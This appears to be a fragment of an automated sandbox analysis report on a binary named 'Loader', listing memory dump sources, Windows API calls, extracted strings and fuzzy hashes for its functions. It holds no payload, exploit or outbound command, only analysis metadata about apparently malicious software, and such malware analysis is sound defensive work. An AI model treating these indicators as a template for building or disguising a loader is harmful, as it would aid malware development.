                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustPointer
                                                                                        • String ID:
                                                                                        • API String ID: 1740715915-0
                                                                                        • Opcode ID: 5f0246d8c8b917c91456bb95fc5b52891a6b26f3b6e8d785029ef2489141fc68
                                                                                        • Instruction ID: 98e42fa7bf54e348b2d36df310f500d156dd7e4a7b09d2bda9e0ea0c8b18a3b2
                                                                                        • Opcode Fuzzy Hash: 5f0246d8c8b917c91456bb95fc5b52891a6b26f3b6e8d785029ef2489141fc68
                                                                                        • Instruction Fuzzy Hash: 1C51E3B26012199FDB298F50DA41FAA77A4FF00318F1C513DE916672A1E733EC42C751
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2
                                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00ED0BEA
                                                                                        • __dosmaperr.LIBCMT ref: 00ED0BF1
                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00ED0C2B
                                                                                        • __dosmaperr.LIBCMT ref: 00ED0C32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1913693674-0
                                                                                        • Opcode ID: cfb1af9abf0a81a81582b71f09b008e83da38a6e5eb05aacb8f9905f9cd016d5
                                                                                        • Instruction ID: 872cdd4b14722949a02105bd62a90f311c79c8025c9faf013bcbc47e9373d248
                                                                                        • Opcode Fuzzy Hash: cfb1af9abf0a81a81582b71f09b008e83da38a6e5eb05aacb8f9905f9cd016d5
                                                                                        • Instruction Fuzzy Hash: 1321C571604215AF9B20AF61C881FABB7A8FF40368F18562EF959F7351D731EC028790
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 16eb56d2051b5ef92fba980af42d47bd88bb471089b403352cb13279ac3ea34a
                                                                                        • Instruction ID: c1aa0a0b40582f965b0bd822bd5e957fbc1bd7a964daa32d38069cd1a88ccdcd
                                                                                        • Opcode Fuzzy Hash: 16eb56d2051b5ef92fba980af42d47bd88bb471089b403352cb13279ac3ea34a
                                                                                        • Instruction Fuzzy Hash: EB21D7712002056FDB10AF618E81FAB77ADAF4336871455ADF919F7152E732EC128790
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00ED1F84
                                                                                          • Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ED1FBC
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ED1FDC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 158306478-0
                                                                                        • Opcode ID: 568bb48c4ff4f2c81f6c99f30a25124c5850b5f3c3302aa72d7d8e0409376185
                                                                                        • Instruction ID: ab2ef57568631bad7ac03f6b2f6cfa4afaa183c2729defa7f0a949b6ccc34f9a
                                                                                        • Opcode Fuzzy Hash: 568bb48c4ff4f2c81f6c99f30a25124c5850b5f3c3302aa72d7d8e0409376185
                                                                                        • Instruction Fuzzy Hash: 9E11E1B250460D7EA62127B25D89CBF6DADCE593AD715203AF906F6241FA318D02D2B2
                                                                                        APIs
                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00EB2A8D
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EB2A9B
                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00EB2AB4
                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00EB2AF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                        • String ID:
                                                                                        • API String ID: 2261580123-0
                                                                                        • Opcode ID: 21780ca8b90e2ed89f686e32247104afc191ed5d2d2fa8bb3b64a7bc42a15070
                                                                                        • Instruction ID: 1595750cefe9c647a65e3d424e080e96f646a044b0a6683ba80cadb26087b18b
                                                                                        • Opcode Fuzzy Hash: 21780ca8b90e2ed89f686e32247104afc191ed5d2d2fa8bb3b64a7bc42a15070
                                                                                        • Instruction Fuzzy Hash: 6221E2B4E042098FCB08EFA8C5956AEFBF0BF48300F11946DE899AB351D7389941CF51
                                                                                        APIs
                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000), ref: 00EDA487
                                                                                        • GetLastError.KERNEL32(?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?,?,?,00ED2DF7,?), ref: 00EDA493
                                                                                          • Part of subcall function 00EDA4E4: CloseHandle.KERNEL32(FFFFFFFE,00EDA4A3,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?,?), ref: 00EDA4F4
                                                                                        • ___initconout.LIBCMT ref: 00EDA4A3
                                                                                          • Part of subcall function 00EDA4C5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EDA461,00ED993F,?,?,00ED34B1,?,00000000,00000000,?), ref: 00EDA4D8
                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?), ref: 00EDA4B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                        • String ID:
                                                                                        • API String ID: 2744216297-0
                                                                                        • Opcode ID: 9747a534bedf4f6d0fa62f3231d84df37174e45cf3080de2803728994b048900
                                                                                        • Instruction ID: 6b04e7323492d622e264a5561302be2db0275c228075e978de239f970cd69a97
                                                                                        • Opcode Fuzzy Hash: 9747a534bedf4f6d0fa62f3231d84df37174e45cf3080de2803728994b048900
                                                                                        • Instruction Fuzzy Hash: B9F03736000559BFCF222F92EC4898D3F66FB453A0B054421FE2DA9270D672CA209B95
                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00EBEFB9
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EBEFC8
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00EBEFD1
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00EBEFDE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                        • String ID:
                                                                                        • API String ID: 2933794660-0
                                                                                        • Opcode ID: c943d41eb55bbdd099740aa482ff6ab5d145ae6b00b25e322d8afa725f4b221e
                                                                                        • Instruction ID: c5d54e8326a6569928ec6745f661902636bec7c6b875e2a0c649e8d6348f12dc
                                                                                        • Opcode Fuzzy Hash: c943d41eb55bbdd099740aa482ff6ab5d145ae6b00b25e322d8afa725f4b221e
                                                                                        • Instruction Fuzzy Hash: 51F0B770C0020CEFCB00DFB5C68898EB7F4EF1C200B5149A5A412FB150E730AB44CB50
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strcspn
                                                                                        • String ID: @
                                                                                        • API String ID: 3709121408-2766056989
                                                                                        • Opcode ID: d445c99962a7485cce21b10e9c92c7a01567271d0dbc05e713175213c29a1725
                                                                                        • Instruction ID: d915e88e0e57bc4c7a9e69fe1553126a0f519625c3905322df0f3475e7a47fdc
                                                                                        • Opcode Fuzzy Hash: d445c99962a7485cce21b10e9c92c7a01567271d0dbc05e713175213c29a1725
                                                                                        • Instruction Fuzzy Hash: 3232C3B49042698FCB24DF64C981ADEFBF5BF48300F0585AAE849A7351D734AE85CF91
                                                                                        APIs
                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00ECA6E1,?,?,00000000,00000000,00000000,?), ref: 00ECA805
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 2118026453-2084237596
                                                                                        • Opcode ID: 72b334d7ba0816f51b5d8d90aea51ce6904bf724261b3fedc0863ec819f6f9ff
                                                                                        • Instruction ID: cc740fe4c91df9bc188de9ceae4cc15689b3511dd0d2b9dd0ca25584639dd141
                                                                                        • Opcode Fuzzy Hash: 72b334d7ba0816f51b5d8d90aea51ce6904bf724261b3fedc0863ec819f6f9ff
                                                                                        • Instruction Fuzzy Hash: BD41797290020DAFCF19CF94CE85EEEBBB5BF48308F189169F90476221D2369952DB51
                                                                                        APIs
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00ECA2C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___except_validate_context_record
                                                                                        • String ID: csm$csm
                                                                                        • API String ID: 3493665558-3733052814
                                                                                        • Opcode ID: c6d52403e64f23b7cbed75914b3caa252e2a80393005795e8f6484fad3014528
                                                                                        • Instruction ID: e0e9f786c6a9a36e47238fdfbdd81b44bf3e79a22e98c1165bc2de9d17b6b334
                                                                                        • Opcode Fuzzy Hash: c6d52403e64f23b7cbed75914b3caa252e2a80393005795e8f6484fad3014528
                                                                                        • Instruction Fuzzy Hash: BE31C03250029CDBCF228F58DA58EAE7B66EB0871DB1C516EFC5429121C337C863DB82
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00EB4B2B
                                                                                          • Part of subcall function 00EBBE78: _Yarn.LIBCPMT ref: 00EBBE98
                                                                                          • Part of subcall function 00EBBE78: _Yarn.LIBCPMT ref: 00EBBEBC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Yarn$LockitLockit::_std::_
                                                                                        • String ID: ^I$bad locale name
                                                                                        • API String ID: 360232963-2946685981
                                                                                        • Opcode ID: 888d23aeea5f147a8e6e837095974af9067a113dd5cd6fcef09fa9cd0b2718f3
                                                                                        • Instruction ID: 2af3c087ecef989d01c827ad86edf440288a344280d7226125cee870566c833c
                                                                                        • Opcode Fuzzy Hash: 888d23aeea5f147a8e6e837095974af9067a113dd5cd6fcef09fa9cd0b2718f3
                                                                                        • Instruction Fuzzy Hash: 6B01ED7090410C9BDB08FFA9D4917EEBBF1AF44308F10546CE64677383CA30AA90CB96
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: #v
                                                                                        • API String ID: 3664257935-554117064
                                                                                        • Opcode ID: e4a73d14671516302fc69e37b726d03402eb73aa1b9a91041ce44988f14adb0f
                                                                                        • Instruction ID: 9b18566d4e96ae93285f44559f1d2ac0018208de3663c012f330816dda0b2a28
                                                                                        • Opcode Fuzzy Hash: e4a73d14671516302fc69e37b726d03402eb73aa1b9a91041ce44988f14adb0f
                                                                                        • Instruction Fuzzy Hash: AFC0027D980400AFDF026B61FF0E81C3B39AB5A3067040039A40995033DA7A09389B5B